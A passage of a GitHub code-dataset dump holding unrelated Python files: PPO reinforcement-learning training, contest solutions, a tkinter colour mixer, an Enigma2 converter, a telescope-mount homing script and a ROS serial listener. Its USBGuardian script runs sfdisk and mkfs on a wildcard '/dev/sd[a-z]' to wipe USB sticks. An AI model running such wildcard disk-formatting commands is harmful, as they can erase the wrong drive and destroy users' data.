range(args.num_envs)])\n agent = Agent(obs_dim, act_dim).to(device)\n optimizer = optim.Adam(agent.parameters(), lr=args.learning_rate, eps=1e-5)\n\n # ALGO Logic: Storage setup\n obs = torch.zeros((args.num_steps, args.num_envs, obs_dim)).to(device)\n actions = torch.zeros((args.num_steps, args.num_envs, act_dim)).to(device)\n logprobs = torch.zeros((args.num_steps, args.num_envs)).to(device)\n rewards = torch.zeros((args.num_steps, args.num_envs)).to(device)\n dones = torch.zeros((args.num_steps, args.num_envs)).to(device)\n values = torch.zeros((args.num_steps, args.num_envs)).to(device)\n\n # TRY NOT TO MODIFY: start the game\n global_step = 0\n start_time = time.time()\n next_obs = torch.Tensor(envs.reset()).to(device)\n next_done = torch.zeros(args.num_envs).to(device)\n num_updates = args.total_timesteps // args.batch_size\n\n for update in trange(1, num_updates + 1):\n for step in range(0, args.num_steps):\n global_step += 1 * args.num_envs\n obs[step] = next_obs\n dones[step] = next_done\n\n # ALGO LOGIC: action logic\n with torch.no_grad():\n action, logprob, _, value = agent.get_action_and_value(\n next_obs)\n values[step] = value.flatten()\n actions[step] = action\n logprobs[step] = logprob\n\n # TRY NOT TO MODIFY: execute the game and log data.\n next_obs, reward, done, info = envs.step(action.cpu().numpy().clip(-0.99999, 0.99999))\n rewards[step] = torch.tensor(reward).to(device).view(-1)\n next_obs, next_done = torch.Tensor(next_obs).to(\n device), torch.Tensor(done).to(device)\n\n # bootstrap value if not done\n with torch.no_grad():\n next_value = agent.get_value(next_obs).reshape(1, -1)\n if args.gae:\n advantages = torch.zeros_like(rewards).to(device)\n lastgaelam = 0\n for t in reversed(range(args.num_steps)):\n if t == args.num_steps - 1:\n nextnonterminal = 1.0 - next_done\n nextvalues = next_value\n else:\n nextnonterminal = 1.0 - dones[t + 1]\n nextvalues = values[t + 1]\n delta = rewards[\n t] + args.gamma * nextvalues * nextnonterminal - values[\n t]\n advantages[\n t] = lastgaelam = delta + args.gamma * args.gae_lambda * nextnonterminal * lastgaelam\n returns = advantages + values\n else:\n returns = torch.zeros_like(rewards).to(device)\n for t in reversed(range(args.num_steps)):\n if t == args.num_steps - 1:\n nextnonterminal = 1.0 - next_done\n next_return = next_value\n else:\n nextnonterminal = 1.0 - dones[t + 1]\n next_return = returns[t + 1]\n returns[t] = rewards[\n t] + args.gamma * nextnonterminal * next_return\n advantages = returns - values\n\n # flatten the batch\n b_obs = obs.reshape((-1, ) + envs.single_observation_space.shape)\n b_logprobs = logprobs.reshape(-1)\n b_actions = actions.reshape((-1, ) + envs.single_action_space.shape)\n b_advantages = advantages.reshape(-1)\n b_returns = returns.reshape(-1)\n b_values = values.reshape(-1)\n\n # Optimizing the policy and value network\n b_inds = np.arange(args.batch_size)\n clipfracs = []\n for epoch in range(args.update_epochs):\n np.random.shuffle(b_inds)\n for start in range(0, args.batch_size, args.minibatch_size):\n end = start + args.minibatch_size\n mb_inds = b_inds[start:end]\n\n _, newlogprob, entropy, newvalue = agent.get_action_and_value(\n b_obs[mb_inds], b_actions[mb_inds])\n logratio = newlogprob - b_logprobs[mb_inds]\n ratio = logratio.exp()\n\n with torch.no_grad():\n # calculate approx_kl http://joschu.net/blog/kl-approx.html\n old_approx_kl = (-logratio).mean()\n approx_kl = ((ratio - 1) - logratio).mean()\n clipfracs += [((ratio - 1.0).abs() >\n args.clip_coef).float().mean().item()]\n\n mb_advantages = b_advantages[mb_inds]\n if args.norm_adv:\n mb_advantages = (mb_advantages - mb_advantages.mean()) / (\n mb_advantages.std() + 1e-8)\n\n # Policy loss\n pg_loss1 = -mb_advantages * ratio\n pg_loss2 = -mb_advantages * torch.clamp(\n ratio, 1 - args.clip_coef, 1 + args.clip_coef)\n pg_loss = torch.max(pg_loss1, pg_loss2).mean()\n\n # Value loss\n newvalue = newvalue.view(-1)\n if args.clip_vloss:\n v_loss_unclipped = (newvalue - b_returns[mb_inds])**2\n v_clipped = b_values[mb_inds] + torch.clamp(\n newvalue - b_values[mb_inds],\n -args.clip_coef,\n args.clip_coef,\n )\n v_loss_clipped = (v_clipped - b_returns[mb_inds])**2\n v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)\n v_loss = 0.5 * v_loss_max.mean()\n else:\n v_loss = 0.5 * ((newvalue - b_returns[mb_inds])**2).mean()\n\n entropy_loss = entropy.mean()\n loss = pg_loss - args.ent_coef * entropy_loss + v_loss * args.vf_coef\n\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm_(agent.parameters(),\n args.max_grad_norm)\n optimizer.step()\n\n if args.target_kl is not None:\n if approx_kl > args.target_kl:\n break\n\n y_pred, y_true = b_values.cpu().numpy(), b_returns.cpu().numpy()\n var_y = np.var(y_true)\n explained_var = np.nan if var_y == 0 else 1 - np.var(y_true -\n y_pred) / var_y\n\n # TRY NOT TO MODIFY: record rewards for plotting purposes\n eval_reward, _, _ = eval_policy(agent, eval_env)\n print(\n f\"#Step {global_step}: reward = {eval_reward:.2f}\\n\"\n f\"\\tvalue_loss={v_loss.item():.3f}, \"\n f\"policy_loss={pg_loss.item():.3f}, \"\n f\"entropy_loss={entropy_loss.item():.3f}\\n\"\n f\"\\tavg_old_logp={b_logprobs[mb_inds].mean().item():.3f}, \"\n f\"max_old_logp={b_logprobs[mb_inds].max().item():.3f}, \"\n f\"min_old_logp={b_logprobs[mb_inds].min().item():.3f}\\n\"\n f\"\\tavg_logp={newlogprob.mean().item():.3f}, \"\n f\"max_logp={newlogprob.max().item():.3f}, \"\n f\"min_logp={newlogprob.min().item():.3f}\\n\"\n f\"\\tavg_value={newvalue.mean().item():.3f}, \"\n f\"max_value={newvalue.max().item():.3f}, \"\n f\"min_value={newvalue.min().item():.3f}\\n\"\n f\"\\tavg_ratio={ratio.mean().item():.3f}, \"\n f\"max_ratio={ratio.max().item():.3f}, \"\n f\"min_ratio={ratio.min().item():.3f}\\n\"\n f\"\\tsampled_actions = (\"\n f\"{abs(b_actions[:, 0]).mean():.3f}, \"\n f\"{abs(b_actions[:, 1]).mean():.3f}, \"\n f\"{abs(b_actions[:, 2]).mean():.3f}, \"\n f\"{abs(b_actions[:, 3]).mean():.3f}, \"\n f\"{abs(b_actions[:, 4]).mean():.3f}, \"\n f\"{abs(b_actions[:, 5]).mean():.3f})\\n\"\n )\n envs.close()\n","repo_name":"fuyw/jrlzoo","sub_path":"ppo/mujoco/ppo_cleanrl/cleanrl.py","file_name":"cleanrl.py","file_ext":"py","file_size_in_byte":13808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"9789002278","text":"from collections import defaultdict\r\nf=lambda:list(map(int,input().split()))\r\nn,m=f()\r\nh=f()\r\na=f();s=[]\r\nd=defaultdict(int)\r\nfor i in h:\r\n d[i]+=1\r\nh=sorted(list(d.keys()))\r\nn=len(h)\r\nfor i in a:\r\n l=-1;r=n\r\n while(r>l+1):\r\n mid=(l+r)//2\r\n if(h[mid]<=i):\r\n l=mid\r\n else:\r\n r=mid\r\n while(d[h[l]]==0 and l>-1):\r\n l-=1\r\n \r\n s=h[l] if l>=0 else -1\r\n print(s)\r\n d[h[l]]-=1\r\n","repo_name":"charlie219/CSES-Solutions","sub_path":"Sorting and Searching/Concert Tickets.py","file_name":"Concert Tickets.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22635250671","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nfrom collections import defaultdict\ndict = defaultdict(list)\nn,m=map(int,input().split())\n# print(n)\nfor i in range(n):\n A=input()\n dict[A].append(str(i+1))\nfor j in range(m):\n B=input()\n if B in dict:\n print(\" \".join(dict[B]))\n else: print (-1)\n \n \n \n \n \n","repo_name":"jealsab/Competitive-Programming","sub_path":"defaultdicttutorial.py","file_name":"defaultdicttutorial.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26702474279","text":"\"\"\"\nExample of isotope specific extensions to the periodic table.\n\"\"\"\nfrom periodictable.core import Isotope\n\ndef init(table, reload=False):\n if 'shells' in table.properties and not reload: return\n table.properties.append('shells')\n\n # Set the default. This is required, even if it is only\n # setting it to None. If the attribute is missing then\n # the isotope data reverts to the element to supply the\n # value, which is almost certainly not what you want.\n Isotope.shells = None\n\n # Load the data\n for symbol,eldata in data.items():\n el = table.symbol(symbol)\n for iso,isodata in eldata.items():\n el[iso].shells = isodata\n\n# Define the data\ndata = dict(\n Fe = {56: \"56-Fe shell info\",\n 58: \"58-Fe shell info\",\n },\n )\n","repo_name":"pkienzle/periodictable","sub_path":"doc/sphinx/shelltable/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"37"} +{"seq_id":"10329665441","text":"\"\"\"\nRGBの数字で計算をすることで絵具を混ぜるような体験が出来るプログラム\n\"\"\"\n\nimport tkinter\nimport random\n\ndef rgb2hex(r,g,b): #RGB配列からHTMLなどに使われる16進数表現へ\n # r , g , b = 0 〜 255 # int型\n color = (r, g , b)\n html_color = '#%02X%02X%02X' % (color[0],color[1],color[2])\n return html_color\n\ndef click_btn():\n red = 0\n green = 0\n blue = 0\n for i in range(7):\n if bvar[i].get() == True:\n red += colors[i][0]\n green += colors[i][1]\n blue += colors[i][2]\n red = int(red % 256) \n green = int(green % 256) \n blue = int(blue % 256) \n print((red,green,blue))\n text.delete(\"1.0\", tkinter.END)\n text.insert(\"1.0\", \"混ぜたらこんな色になりました。\")\n label = tkinter.Label(root,width = 40, height =3, bg =rgb2hex(red, green, blue) )\n label.place(x = 320,y = 70)\n\nroot = tkinter.Tk()\nroot.title(\"絵具混ぜ混ぜアプリ\")\nroot.resizable(False, False)\ncanvas = tkinter.Canvas(root, width=800, height=600)\ncanvas.pack()\ngazou = tkinter.PhotoImage(file=\"haikei.png\")\ncanvas.create_image(400, 300, image=gazou)\nbutton = tkinter.Button(text=\"MIX!!\", font=(\"Times New Roman\", 32), bg=\"lightgreen\", command=click_btn)\nbutton.place(x=400, y=480)\ntext = tkinter.Text(width=40, height=1, font=(\"Times New Roman\", 16))\ntext.place(x=320, y=30)\n\nbvar = [None]*7\ncbtn = [None]*7\nITEM = [\n\"赤\",\n\"ゴールド\",\n\"ミディアムストレートブルー\",\n\"ダークグリーン\",\n\"ドジャーブルー\",\n\"シエナ\",\n\"ダークグレー\"\n]\n\ncolors = [\n[255,0,0],\n[255,215,0],\n[123,104,238],\n[0,100,0],\n[30,144,255],\n[160,82,45],\n[169,169,169] \n] \n \nfor i in range(7):\n bvar[i] = tkinter.BooleanVar()\n bvar[i].set(False)\n cbtn[i] = tkinter.Checkbutton(text=ITEM[i], font=(\"Times New Roman\", 12), variable=bvar[i], bg=rgb2hex(colors[i][0], colors[i][1], colors[i][2]))\n cbtn[i].place(x=400, y=160+40*i)\nroot.mainloop()\n","repo_name":"OhataKazuki/my-program","sub_path":"プログラム教材改造/絵具混ぜ混ぜ/絵具混ぜ混ぜ 改造.py","file_name":"絵具混ぜ混ぜ 改造.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20778782075","text":"#!/usr/bin/python3.5\n#-*- coding:utf-8 -*-\n\nimport os\n\n#Unmount the USB stick\nos.system(\"sudo umount /mnt/usb\")\n\n#Open the report file\nwith open(\"/opt/USBGuardian/logs/report.log\") as report:\n\n\tfor line in report:\n\n\t\t#If the USB stick is not partitioned, create a partition and format it\n\t\tif \"Partitioned: no\" in line:\n\t\t\tos.system(\"echo ',,7;' | sfdisk /dev/sd[a-z]\")\n\t\t\tos.system(\"mkfs.vfat -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\t#If the USB stick is partitioned, format the USB stick depending on the format\n\t\telif \"FAT16\" in line:\n\t\t\tos.system(\"sudo mkfs.fat -F 16 -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\telif \"FAT32\" in line:\n\t\t\tos.system(\"sudo mkfs.fat -F 32 -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n\n\t\telif \"VFAT\" in line:\n\t\t\tos.system(\"sudo mkfs.vfat -I /dev/sd[a-z][0-9]\")\n\t\t\tbreak\n","repo_name":"USBGuardian/USBGuardian","sub_path":"USBGuardian-core/USBGuardian/scripts/formatUSB.py","file_name":"formatUSB.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"75170950506","text":"# -*- coding: utf-8 -*-\n\n# ECM Line Converter\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom enigma import iServiceInformation, iPlayableService\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Components.Converter.Poll import Poll\nimport os, gettext\nfrom Tools.Directories import fileExists\nfrom Tools.Directories import resolveFilename, SCOPE_LANGUAGE, SCOPE_PLUGINS\nfrom Components.Language import language\n\nif fileExists(\"/etc/enigma2/ci0.xml\") or fileExists(\"/etc/enigma2/ci1.xml\"):\n\t\tCI = True\nelse:\n\t\tCI = False\n\nlang = language.getLanguage()\nos.environ[\"LANGUAGE\"] = lang[:2]\ngettext.bindtextdomain(\"enigma2\", resolveFilename(SCOPE_LANGUAGE))\ngettext.textdomain(\"enigma2\")\ngettext.bindtextdomain(\"KravenHD\", \"%s%s\" % (resolveFilename(SCOPE_PLUGINS), \"Extensions/KravenHD/locale/\"))\n\ndef _(txt):\n\tt = gettext.dgettext(\"KravenHD\", txt)\n\tif t == txt:\n\t\tt = gettext.gettext(txt)\n\treturn t\n\nclass KravenHDECMLine(Poll, Converter, object):\n\n\tSATINFO = 0\n\tVERYSHORTCAID = 1\n\tVERYSHORTREADER = 2\n\tSHORTREADER = 3\n\tNORMAL = 4\n\tLONG = 5\n\tVERYLONG = 6\n\n\tFTAINVISIBLE = 0\n\tFTAVISIBLE = 1\n\n\tdef __init__(self, type):\n\t\tPoll.__init__(self)\n\t\tConverter.__init__(self, type)\n\n\t\targs = type.split(',')\n\t\tif len(args) != 2:\n\t\t\traise ElementError(\"type must contain exactly 2 arguments\")\n\n\t\ttype = args.pop(0)\n\t\tinvisible = args.pop(0)\n\n\t\tif type == 'SatInfo':\n\t\t\tself.type = self.SATINFO\n\t\telif type == 'VeryShortCaid':\n\t\t\tself.type = self.VERYSHORTCAID\n\t\telif type == 'VeryShortReader':\n\t\t\tself.type = self.VERYSHORTREADER\n\t\telif type == 'ShortReader':\n\t\t\tself.type = self.SHORTREADER\n\t\telif type == 'Normal':\n\t\t\tself.type = self.NORMAL\n\t\telif type == 'Long':\n\t\t\tself.type = self.LONG\n\t\telse:\n\t\t\tself.type = self.VERYLONG\n\n\t\tif invisible == \"FTAInvisible\":\n\t\t\tself.invisible = self.FTAINVISIBLE\n\t\telse:\n\t\t\tself.invisible = self.FTAVISIBLE\n\n\t\tself.poll_interval = 1000\n\t\tself.poll_enabled = True\n\n\t@cached\n\tdef getText(self):\n\n\t\tif self.IsCrypted():\n\t\t\ttry:\n\t\t\t\tf = open('/tmp/ecm.info', 'r')\n\t\t\t\tflines = f.readlines()\n\t\t\t\tf.close()\n\t\t\texcept:\n\t\t\t\t\n\t\t\t\tif CI:\n\t\t\t\t\tecmline = _('CI Modul')\n\n\t\t\t\telse:\n\t\t\t\t\tecmline = _('waiting for information ...')\n\t\n\t\t\telse:\n\t\t\t\tcamInfo = {}\n\t\t\t\tfor line in flines:\n\t\t\t\t\tr = line.split(':', 1)\n\t\t\t\t\tif len(r) > 1 :\n\t\t\t\t\t\tcamInfo[r[0].strip('\\n\\r\\t ')] = r[1].strip('\\n\\r\\t ')\n\n\t\t\t\tcaid = camInfo.get('caid', '')\n\t\t\t\tcaid = caid.lstrip('0x')\n\t\t\t\tcaid = caid.upper()\n\t\t\t\tcaid = caid.zfill(4)\n\n\t\t\t\tif ((caid>='1800') and (caid<='18FF')):\n\t\t\t\t\tsystem = 'System: NAGRA'\n\t\t\t\telif ((caid>='1700') and (caid<='17FF')):\n\t\t\t\t\tsystem = 'System: BETA'\n\t\t\t\telif ((caid>='0E00') and (caid<='0EFF')):\n\t\t\t\t\tsystem = 'System: POWERVU'\n\t\t\t\telif ((caid>='0D00') and (caid<='0DFF')):\n\t\t\t\t\tsystem = 'System: CWORKS'\n\t\t\t\telif ((caid>='0B00') and (caid<='0BFF')):\n\t\t\t\t\tsystem = 'System: CONAX'\n\t\t\t\telif ((caid>='0900') and (caid<='09FF')):\n\t\t\t\t\tsystem = 'System: NDS'\n\t\t\t\telif ((caid>='0600') and (caid<='06FF')):\n\t\t\t\t\tsystem = 'System: IRDETO'\n\t\t\t\telif ((caid>='0500') and (caid<='05FF')):\n\t\t\t\t\tsystem = 'System: VIACCESS'\n\t\t\t\telif ((caid>='0100') and (caid<='01FF')):\n\t\t\t\t\tsystem = 'System: SECA'\n\t\t\t\telse:\n\t\t\t\t\tsystem = _('System: unknown')\n\n\t\t\t\tcaid = 'CAID: ' + str(caid)\n\n\t\t\t\tprov = camInfo.get('prov', '')\n\t\t\t\tprov = prov.lstrip(\"0x\")\n\t\t\t\tprov = prov.upper()\n\t\t\t\tprov = prov.zfill(6)\n\t\t\t\tprov = 'Provider: ' + prov\n\n\t\t\t\tecmtime = camInfo.get('ecm time', '')\n\t\t\t\tif ecmtime:\n\t\t\t\t\tif \"msec\" in ecmtime:\n\t\t\t\t\t\tecmtime = 'ECM: ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmtime = 'ECM: ' + ecmtime + ' s'\n\n\t\t\t\thops = 'Hops: ' + str(camInfo.get('hops', ''))\n\t\t\t\taddress = 'Server: ' + str(camInfo.get('address', ''))\n\t\t\t\treader = 'Reader: ' + str(camInfo.get('reader', ''))\n\t\t\t\tsource = 'Source: ' + str(camInfo.get('source', ''))\n\t\t\t\tdecode = 'Decode: ' + str(camInfo.get('decode', ''))\n\n\t\t\t\tusing = str(camInfo.get('using', ''))\n\n\t\t\t\tactive = ''\n\n\t\t\t\tif source == 'emu':\n\t\t\t\t\tactive = 'EMU'\n\t\t\t\t\tecmline = active + ' - ' + caid\n\n\t\t\t\telif using == 'emu':\n\t\t\t\t\tactive = 'EMU'\n\t\t\t\t\tif self.type in (self.SATINFO, self.VERYSHORTCAID, self.VERYSHORTREADER):\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + ecmtime\n\n\t\t\t\telif 'system' in camInfo :\n\t\t\t\t\tactive = 'CCCAM'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = address + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + address + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + address + ' - ' + hops + ' - ' + ecmtime\n\n\t\t\t\telif 'decode' in camInfo :\n\t\t\t\t\tactive = 'GBOX'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = active\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active\n\n\t\t\t\telif 'reader' in camInfo :\n\t\t\t\t\tactive = 'OSCAM'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = reader + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + reader + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + reader + ' - ' + hops + ' - ' + ecmtime\n\n\t\t\t\telif 'prov' in camInfo :\n\t\t\t\t\tactive = 'MGCAMD'\n\t\t\t\t\tif self.type == self.SATINFO:\n\t\t\t\t\t\tecmline = caid + ', ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTCAID:\n\t\t\t\t\t\tecmline = caid + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.VERYSHORTREADER:\n\t\t\t\t\t\tecmline = source + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.SHORTREADER:\n\t\t\t\t\t\tecmline = caid + ' - ' + source + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.NORMAL:\n\t\t\t\t\t\tecmline = caid + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\t\t\t\t\telif self.type == self.LONG:\n\t\t\t\t\t\tecmline = caid + ' - ' + system + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\t\t\t\t\telse:\n\t\t\t\t\t\tecmline = active + ' - ' + caid + ' - ' + system + ' - ' + source + ' - ' + prov + ' - ' + ecmtime\n\n\t\t\t\telse:\n\t\t\t\t\tactive = _('unknown')\n\t\t\t\t\tecmline = _('no information available')\n\n\t\telse:\n\t\t\tif self.invisible == self.FTAINVISIBLE:\n\t\t\t\tecmline = ''\n\t\t\telse:\n\t\t\t\tecmline = _('free to air')\n\n\t\treturn ecmline\n\n\ttext = property(getText)\n\n\t@cached\n\tdef IsCrypted(self):\n\t\tcrypted = 0\n\t\tservice = self.source.service\n\t\tif service:\n\t\t\tinfo = service and service.info()\n\t\t\tif info:\n\t\t\t\tcrypted = info.getInfo(iServiceInformation.sIsCrypted)\n\t\treturn crypted\n\n\tdef get_system_caid(self):\n\t\tcaidlist = []\n\t\tservice = self.source.service\n\t\tif service:\n\t\t\tinfo = service and service.info()\n\t\t\tif info:\n\t\t\t\tcaids = info.getInfoObject(iServiceInformation.sCAIDs)\n\t\t\t\tif caids:\n\t\t\t\t\tfor caid in caids:\n\t\t\t\t\t\tcaidlist.append((str(hex(int(caid)))))\n\t\treturn caidlist\n\n\tdef changed(self, what):\n\t\tif (what[0] == self.CHANGED_SPECIFIC and what[1] == iPlayableService.evUpdatedInfo) or what[0] == self.CHANGED_POLL:\n\t\t\tConverter.changed(self, what)\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Components/Converter/KravenHDECMLine.py","file_name":"KravenHDECMLine.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"790618787","text":"__all__ = [\"HomeBothAxes\"]\n\nimport time\n\nfrom lsst.ts import salobj\nfrom lsst.ts.observatory.control.maintel.mtcs import MTCS, MTCSUsages\n\n\nclass HomeBothAxes(salobj.BaseScript):\n \"\"\"Home azimuth and elevation axes of the MTMount.\n Must call this after powering on the main axis and\n BEFORE you move them.\n\n Parameters\n ----------\n index : `int`\n Index of Script SAL component.\n\n Notes\n -----\n **Checkpoints**\n\n - \"Homing Both Axes\": Before commanding both axes to be homed.\n\n **Details**\n\n This script homes both aximuth and elevation axes of\n the Simonyi Main Telescope mount.\n\n\n \"\"\"\n\n def __init__(self, index, add_remotes: bool = True):\n super().__init__(index=index, descr=\"Raise M1M3\")\n\n mtcs_usage = None if add_remotes else MTCSUsages.DryTest\n\n self.mtcs = MTCS(domain=self.domain, intended_usage=mtcs_usage, log=self.log)\n\n self.home_both_axes_timeout = 300.0 # timeout to home both MTMount axes.\n\n @classmethod\n def get_schema(cls):\n return None\n\n async def configure(self, config):\n # This script does not require any configuration.\n pass\n\n def set_metadata(self, metadata):\n metadata.duration = self.home_both_axes_timeout\n\n async def run(self):\n await self.checkpoint(\"Disable M1M3 balance system.\")\n await self.mtcs.disable_m1m3_balance_system()\n\n await self.checkpoint(\"Homing Both Axes\")\n start_time = time.time()\n await self.mtcs.rem.mtmount.cmd_homeBothAxes.start(\n timeout=self.home_both_axes_timeout\n )\n end_time = time.time()\n elapsed_time = end_time - start_time\n\n self.log.info(f\"Homing both axes took {elapsed_time:.2f} seconds\")\n","repo_name":"lsst-ts/ts_standardscripts","sub_path":"python/lsst/ts/standardscripts/maintel/home_both_axes.py","file_name":"home_both_axes.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37451636173","text":"# it is similar to the bytes\n# index starting from 0\n# byte array can be modified\n\nele = [10, 20, 30, 40, 50, 60]\nx = bytearray(ele)\n\n# update/ replace the element\nx[1] = 200\n\n# print the index\nprint(x[1])\n","repo_name":"SURAJPATIL6088/Python-Programs","sub_path":"Python Programming/Byte_array.py","file_name":"Byte_array.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23824822472","text":"import os\n\nsource = \"text.txt\"\ndestination = \"C:\\\\Users\\\\scott\\\\OneDrive\\\\Desktop\\\\text.txt\"\n\ntry:\n if os.path.exists(destination):\n print('File already exists')\n else:\n os.replace(source, destination)\n print(source + \" was moved\")\n\nexcept FileNotFoundError:\n print(source + \" was not found\")\n\nexcept Exception as e:\n print(e)","repo_name":"scottwhat/python-beginner-projects","sub_path":"filesystem/movefiles.py","file_name":"movefiles.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15715919788","text":"#!/usr/bin/env python3\n\n##################################################\n### -- Node Description \n# This node will be responsible for listening to \n# communication coming from the microcontroller\n# responsible for motor control. The node\n# will then publish this recieved data to ROS\n\n##################################################\n### Imports\n##################################################\n\n# Standard imports\nimport signal\nimport sys\nimport rospy\nfrom std_msgs.msg import Int8\n\n# Serial communication imports\nimport serial\nimport time\n\n##################################################\n### Defines and Constants\n##################################################\n\n# Global constants for the interface protocol between\n# the lower-level microcontroller \nMSG_DELIMITER = '$'\nTABLE_START = \"S\"\nTABLE_END = \"E\"\n\n# Globally configure the UART serial communication\nser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\n\n# Flush the communication line\nser.flush()\n\n##################################################\n### Callbacks\n##################################################\n\n# --------------------------------------\n# ---- Method to handle sigints ----\ndef signal_handler(sig, frame):\n sys.exit(0)\n\n##################################################\n### Methods\n##################################################\n\n# -----------------------------------------------\n# --- Method to read the table of motor data ---\n# --- from the low-level microcontroller ---\ndef Main():\n # Register sigint callback\n signal.signal(signal.SIGINT, signal_handler)\n\n # Initialize the node with name \"motors_listener_node\"\n rospy.init_node('motors_listener_node', anonymous=True)\n\n # Create sensor topics to publish too\n right_motor_pub = rospy.Publisher('RightMotor', Int8, queue_size=10)\n left_motor_pub = rospy.Publisher('LeftMotor', Int8, queue_size=10)\n\n # indefinitely listen to the serial port\n while True:\n # Read in the current response \n line = ser.readline().decode('utf-8').rstrip()\n\n # If we recieve the 'start_table' character, then start\n # reading the table from the microcontroller\n if line == TABLE_START:\n ReadTable(right_motor_pub, left_motor_pub)\n\n\n# -----------------------------------------------\n# --- Method to read the table of motor data ---\n# --- from the low-level microcontroller ---\ndef ReadTable(right_motor_pub, left_motor_pub):\n # Read all the data\n right_motor_message = ReadByte()\n left_motor_message = ReadByte()\n\n # publish all the data\n right_motor_pub.publish(right_motor_message)\n left_motor_pub.publish(left_motor_message)\n \n \n# --------------------------------------\n# --- Read line from serial line ---\ndef ReadByte():\n b = int(ser.readline().decode('utf-8').rstrip())\n message = Int8()\n message.data = b\n\n return message \n\n\nif __name__ == '__main__':\n Main()","repo_name":"Shop-cleaning-vacuum/shop_vacuum_navigation","sub_path":"Ros/src/communications/scripts/motors_listener_node.py","file_name":"motors_listener_node.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 